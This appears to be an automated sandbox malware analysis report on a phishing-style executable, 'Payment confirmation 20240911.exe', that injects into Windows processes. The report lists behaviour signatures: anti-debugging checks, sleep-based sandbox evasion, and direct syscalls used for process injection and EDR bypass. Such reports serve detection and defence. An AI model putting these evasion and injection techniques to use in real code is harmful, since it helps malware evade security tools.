            Source: Binary string: svchost.pdb source: xONxwdydvq.exe, 00000003.00000002.746297118.000000000485C000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745454539.000000000061C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.000000000281C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.453233728.000000000106C000.00000004.80000000.00040000.00000000.sdmp
            Source: Payment confirmation 20240911.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Payment confirmation 20240911.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Payment confirmation 20240911.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Payment confirmation 20240911.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Payment confirmation 20240911.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013420F6 LoadLibraryA,GetProcAddress,0_2_013420F6
            Source: sqlite3.dll.4.drStatic PE information: section name: /4
            Source: sqlite3.dll.4.drStatic PE information: section name: /19
            Source: sqlite3.dll.4.drStatic PE information: section name: /31
            Source: sqlite3.dll.4.drStatic PE information: section name: /45
            Source: sqlite3.dll.4.drStatic PE information: section name: /57
            Source: sqlite3.dll.4.drStatic PE information: section name: /70
            Source: sqlite3.dll.4.drStatic PE information: section name: /81
            Source: sqlite3.dll.4.drStatic PE information: section name: /92
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01307795 push ecx; ret 0_2_013077A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019A7 push es; retf 2_2_00401A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406005 push ds; ret 2_2_00406010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408818 push edi; ret 2_2_004088A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A29 push es; retf 2_2_00401A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414CD3 push edi; iretd 2_2_00414CE1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004144AE push ebx; iretd 2_2_004144AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401566 push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401522 push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004145E3 push edx; ret 2_2_00414605
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040159A push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406FD7 push cs; ret 2_2_00406FD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407784 push esi; iretd 2_2_0040779A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EF85 pushad ; ret 2_2_0041EF4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AF8E push ebp; retf 2_2_0040AFA2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004037A0 push eax; ret 2_2_004037A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008CDFA1 push ecx; ret 2_2_008CDFB4
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0040DAC5 push edi; iretd 3_2_0040DAD9
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0040D2A6 push ebx; iretd 3_2_0040D2A7
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0040EC79 pushfd ; ret 3_2_0040ECD4
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_00403570 push cs; ret 3_2_00403574
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_00417D7D pushad ; ret 3_2_00417D43
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_003FEDFD push ds; ret 3_2_003FEE08
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_00403D86 push ebp; retf 3_2_00403D9A
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_003FFDCF push cs; ret 3_2_003FFDD0
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0040170A push ebx; retf 3_2_0040170B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012FF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_012FF78E
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01347F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01347F0E
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01301E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01301E5A
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeAPI/Special instruction interceptor: Address: 263234
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00910101 rdtsc 2_2_00910101
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeWindow / User API: threadDelayed 656Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeWindow / User API: threadDelayed 9313Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeEvaded block: after key decisiongraph_0-108491
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeEvaded block: after key decisiongraph_0-109299
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-108984
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI coverage: 2.0 %
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe TID: 3332Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe TID: 3332Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3308Thread sleep count: 656 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3308Thread sleep time: -1312000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3360Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3308Thread sleep count: 9313 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3308Thread sleep time: -18626000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012FDD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_012FDD92
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0133219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0133219F
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01332044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_01332044
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_013324A9
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01326B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_01326B3F
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01326E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_01326E4A
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0132F350
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132FD47 FindFirstFileW,FindClose,0_2_0132FD47
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0132FDD2
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012FE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_012FE47B
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00910101 rdtsc 2_2_00910101
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C07AC NtCreateMutant,LdrInitializeThunk,2_2_008C07AC
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0133703C BlockInput,0_2_0133703C
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012E374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_012E374E
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013146D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_013146D0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013420F6 LoadLibraryA,GetProcAddress,0_2_013420F6
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_002634A0 mov eax, dword ptr fs:[00000030h]0_2_002634A0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_00263500 mov eax, dword ptr fs:[00000030h]0_2_00263500
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_00261E70 mov eax, dword ptr fs:[00000030h]0_2_00261E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008B0080 mov ecx, dword ptr fs:[00000030h]2_2_008B0080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008B00EA mov eax, dword ptr fs:[00000030h]2_2_008B00EA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D26F8 mov eax, dword ptr fs:[00000030h]2_2_008D26F8
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0130A937 GetProcessHeap,0_2_0130A937
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01308E19 SetUnhandledExceptionFilter,0_2_01308E19
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01308E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01308E3C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtTerminateThread: Direct from: 0x774D00A6Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
